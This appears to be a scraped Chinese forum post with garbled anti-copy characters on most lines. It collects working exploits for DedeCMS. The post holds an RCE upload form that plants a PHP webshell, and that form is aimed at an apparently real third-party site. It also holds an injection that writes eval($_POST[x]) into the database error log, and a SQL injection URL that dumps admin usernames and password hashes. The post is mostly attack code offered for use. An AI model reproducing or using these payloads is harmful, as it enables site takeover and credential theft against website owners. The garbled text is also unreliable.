7 x, i% Y6 F  Y- Y- E7 T6 U/ T8 x. p& H8 O

; Z, K5 `/ N5 O
% M4 ]6 u) O) X0 m) C8 s) \
" s5 h% T, G  q: K1 L织梦(Dedecms)select_soft_post.php页面变量未初始漏洞% F+ a2 U( D+ o2 a( y- k
<html>- }) @( \0 f. I
<head>
# n% ]- ?1 t( z<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>% x* p% p) N+ o# m% f0 J
</head>9 \1 ^" V  W7 K+ F  m) h6 s
<body style="FONT-SIZE: 9pt">% r; x' |/ _0 i# U" [( q9 I
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
! a; J$ p( @2 C" O, V: V<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
( Q- z/ w* a) x( Q& C<input type='hidden' name='activepath' value='/data/cache/' />
6 C( Q# V6 K5 \  }! s<input type='hidden' name='cfg_basedir' value='../../' />
/ W1 v3 T1 B. x4 {" E<input type='hidden' name='cfg_imgtype' value='php' />6 P, A% K/ n  d8 E- n1 ~
<input type='hidden' name='cfg_not_allowall' value='txt' />  u& W$ w5 r1 i7 f' i
<input type='hidden' name='cfg_softtype' value='php' />
  Y5 ]! w  H1 m; G5 j<input type='hidden' name='cfg_mediatype' value='php' />9 u: U# m) Q% A6 t3 c6 x  a- }
<input type='hidden' name='f' value='form1.enclosure' />) R* s7 h4 l+ L/ Z, \$ m, H
<input type='hidden' name='job' value='upload' />
+ I. @2 B0 P4 H8 r, \& l3 G1 X<input type='hidden' name='newname' value='fly.php' />5 j# J' I" z$ S7 z7 o
Select U Shell <input type='file' name='uploadfile' size='25' />
; L8 p7 d0 W2 h5 e( N  k9 f<input type='submit' name='sb1' value='确定' />% I9 J6 u7 c' e9 x
</form>
- v; V* m8 _% p' q<br />It's just a exp for the bug of Dedecms V55...<br />
7 L3 _" K+ g/ V( ?: u, @Need register_globals = on...<br />, b0 I! b: O" ]
Fun the game,get a webshell at /data/cache/fly.php...<br />6 v" [# q5 ^$ D
</body>2 g; o9 q3 x; B# g( A- L: `
</html>
& T3 _! F2 r/ n  n
: B- A, O' r2 a' o$ I$ n. N( }  }1 X# e5 X3 _2 ^% r
1 t7 Y( m, u+ j- E* k) Z
& r" ^3 R9 u' K3 ^

7 W' j# q& ^% t: [" O" f( m; |. t8 J5 Z( s

, g* I. Z: y5 ]4 s  l! o6 R
- V+ S- U% p7 v/ S2 u# P
# m8 m( O& g/ x! I! v; L2 d- H, B6 t' F. Y3 C2 Q  M& q$ Z- s0 P
织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞* b+ H% w/ y! v: X& n- E8 K
利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。1 `6 i- I/ @6 d! o, @. p
1. 访问网址:$ Z: U' j, k  I8 r# ]' P
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
+ s* r7 f) Y8 X; F+ R$ s* z可看见错误信息
) P; j4 a# s/ G5 E& u, Z; W, l, B! `( X' q+ Y# P: l; h' _8 q
, C8 U* x: S6 d& ^
2. 访问
http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。
6 D" C  Q/ d9 T* oint(3) Error: Illegal double '1024e1024' value found during parsing6 F2 y; A: u; [3 ?- Y
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
. m/ w: ?$ H5 F! I# R6 i2 L- x2 h: n6 m! O( k+ z7 `

' p$ Y: b+ ]8 _/ t! s. u  E  i( m3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是
8 m+ E/ z3 t+ x1 K/ S, e: q1 Q; d: o/ j' d+ w' y" Y& I

! Z$ d5 Q; M2 |5 J3 R: [<form action=”
http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>' `/ k: {+ k* m! o! u0 s
% [8 n0 j/ V# `7 g5 K( i2 d

* U+ F2 R9 e. q2 u按确定后的看到第2步骤的信息表示文件木马上传成功.( ^  b: x) B6 C! n- Y- T3 g+ _
1 S1 o! P. T" [0 Q. r$ D% ]

, _$ V7 z* h# J5 i0 O- g* ^0 J# u( G- P
+ ]% s: C  S; O& r
3 f# a2 g- j2 m; V
0 p: m/ r6 o2 x6 l3 f7 }

8 i/ ~8 X5 u# [
5 U$ z* {: \: D* Y( S% c  |9 r1 t; S4 L& U0 d# t# y
( @( q2 S6 F7 `9 O

* o! Q0 w4 p% S  V/ n! {. {. k
5 ^' T& u1 `3 J/ a8 J/ c* A! O织梦(DedeCms)plus/infosearch.php 文件注入漏洞7 }4 o! `( X; a1 q' d
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表